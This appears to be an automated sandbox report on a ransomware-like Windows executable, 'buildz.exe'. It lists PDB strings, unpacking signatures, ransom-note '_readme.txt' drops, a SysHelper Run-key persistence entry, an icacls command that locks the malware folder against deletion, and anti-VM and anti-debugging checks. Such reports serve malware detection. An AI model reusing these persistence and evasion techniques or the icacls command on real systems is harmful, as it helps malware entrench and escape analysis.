          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\IqY source: buildz.exe, 00000006.00000003.2819183904.000000000388C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789445333.000000000388C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qualw source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: buildz.exe, buildz.exe, 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\{ J source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2912783913.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\** source: buildz.exe, 00000006.00000003.2929144121.000000000393A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2930487981.0000000003989000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929699536.000000000393F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ome\ source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2912783913.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\umN source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935552901.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928758672.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935479787.0000000003A23000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\E5\ source: buildz.exe, 00000006.00000003.2935372852.0000000003990000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2939091443.0000000003990000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\3=w source: buildz.exe, 00000006.00000003.2725563548.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726652522.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726101777.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790348604.0000000003191000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: buildz.exe, 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, buildz.exe, 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\B source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2942712973.0000000003948000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2934520323.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2938642063.0000000003948000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935260210.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2819183904.000000000388C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789445333.000000000388C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\** source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2902251241.0000000003A16000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2912783913.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: buildz.exe, 00000006.00000003.2820323781.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2817512809.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2829424402.00000000037C3000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830462210.00000000037CA000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2829270688.00000000037AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\O source: buildz.exe, 00000006.00000003.2829769340.0000000003863000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cation Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\.pdb\p source: buildz.exe, 00000006.00000003.2902662689.000000000385F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ate\IV source: buildz.exe, 00000006.00000003.2939529146.0000000003888000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2943430433.000000000389D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: buildz.exe, 00000006.00000003.2789952289.000000000312C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725563548.000000000311A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725945284.000000000312E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726806827.0000000003133000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2904297909.0000000003900000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2903124928.00000000038F9000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2903960546.00000000038FF000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2864984375.00000000038FF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\rer\' source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\t source: buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*| source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\fHl source: buildz.exe, 00000006.00000003.2939529146.0000000003888000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2943430433.000000000389D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\achec source: buildz.exe, 00000006.00000003.2911610084.000000000316B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2903790233.0000000003130000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: buildz.exe, 00000006.00000003.2725563548.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726652522.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726101777.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790348604.0000000003191000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2908778230.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2910039214.00000000039B9000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2902251241.0000000003A16000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2912783913.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2934199949.0000000003A8F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\y source: buildz.exe, 00000006.00000003.2902251241.0000000003989000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2904082392.0000000003990000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2901206490.0000000003940000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: buildz.exe, 00000006.00000003.2943551253.000000000388D000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2934520323.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935260210.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2939529146.0000000003888000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2934015295.0000000003888000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2831125784.0000000003950000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2865110592.0000000003939000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2864608950.0000000003938000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2865849961.0000000003951000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2869267366.0000000003958000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: buildz.exe, 00000006.00000003.2818268336.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831789553.0000000003105000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\} source: buildz.exe, 00000006.00000003.2929144121.000000000393A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2929699536.000000000393F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: buildz.exe, 00000006.00000003.2820323781.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2817512809.00000000037AE000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2829270688.00000000037AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2940468429.000000000371C000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2939266286.0000000003716000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: buildz.exe, 00000006.00000003.2865110592.0000000003939000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2873857794.0000000003969000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2864608950.0000000003938000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831125784.0000000003968000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2865849961.0000000003951000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2869267366.0000000003958000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error\ source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\buildz.exeUnpacked PE file: 2.2.buildz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yar:R;.befajam:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\buildz.exeUnpacked PE file: 6.2.buildz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yar:R;.befajam:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeUnpacked PE file: 10.2.buildz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yar:R;.befajam:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeUnpacked PE file: 12.2.buildz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yar:R;.befajam:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeUnpacked PE file: 15.2.buildz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.yar:R;.befajam:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
          Source: C:\Users\user\Desktop\buildz.exeUnpacked PE file: 2.2.buildz.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\buildz.exeUnpacked PE file: 6.2.buildz.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeUnpacked PE file: 10.2.buildz.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeUnpacked PE file: 12.2.buildz.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeUnpacked PE file: 15.2.buildz.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00408D24 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00408D24
          Source: buildz.exeStatic PE information: section name: .yar
          Source: buildz.exeStatic PE information: section name: .befajam
          Source: buildz.exe.2.drStatic PE information: section name: .yar
          Source: buildz.exe.2.drStatic PE information: section name: .befajam
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00403295 push ecx; ret 0_2_004032A8
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00A2F0AF push ecx; retf 0_2_00A2F0B2
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02338F05 push ecx; ret 0_2_02338F18
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00428565 push ecx; ret 2_2_00428578
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_00A450AF push ecx; retf 4_2_00A450B2
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022A8F05 push ecx; ret 4_2_022A8F18
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_008170AF push ecx; retf 5_2_008170B2
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_02328F05 push ecx; ret 5_2_02328F18
          Source: buildz.exeStatic PE information: section name: .text entropy: 7.9697732091070135
          Source: buildz.exe.2.drStatic PE information: section name: .text entropy: 7.9697732091070135

          Persistence and Installation Behavior

          barindex
          Source: C:\Users\user\Desktop\buildz.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeSystem file written: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.htmlJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeJump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelperJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId,2_2_00481920
          Source: C:\Users\user\Desktop\buildz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08" /deny *S-1-1-0:(OI)(CI)(DE,DC)
          Source: C:\Users\user\Desktop\buildz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00A2D71C rdtsc 0_2_00A2D71C
          Source: C:\Users\user\Desktop\buildz.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,2_2_0040E670
          Source: C:\Users\user\Desktop\buildz.exeThread delayed: delay time: 14000000Jump to behavior
          Source: C:\Users\user\Desktop\buildz.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-45022
          Source: C:\Users\user\Desktop\buildz.exe TID: 5528Thread sleep time: -14000000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00410160
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0040F730
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0040FB98
          Source: C:\Users\user\Desktop\buildz.exeThread delayed: delay time: 14000000Jump to behavior
          Source: buildz.exe, 0000000C.00000002.2435783608.00000000008A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWVu
          Source: buildz.exe, 00000002.00000002.2119806926.00000000006D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWtV
          Source: buildz.exe, 00000002.00000002.2119806926.00000000006B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: buildz.exe, 0000000C.00000002.2435783608.0000000000818000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH|
          Source: buildz.exe, 00000002.00000002.2119806926.0000000000678000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000002.00000002.2119806926.00000000006D2000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2202553707.0000000000693000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2490478427.0000000000693000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2490478427.0000000000633000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000002.2949445482.0000000000608000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000002.2949445482.0000000000693000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2344992065.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000A.00000003.2322599097.0000000000782000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000A.00000002.2344992065.0000000000782000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 0000000C.00000002.2435783608.00000000008A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: buildz.exe, 0000000F.00000002.3295167071.0000000000612000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
          Source: C:\Users\user\Desktop\buildz.exeAPI call chain: ExitProcess graph end nodegraph_2-45024
          Source: C:\Users\user\Desktop\buildz.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00A2D71C rdtsc 0_2_00A2D71C
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00401000 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401000
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0042A57A
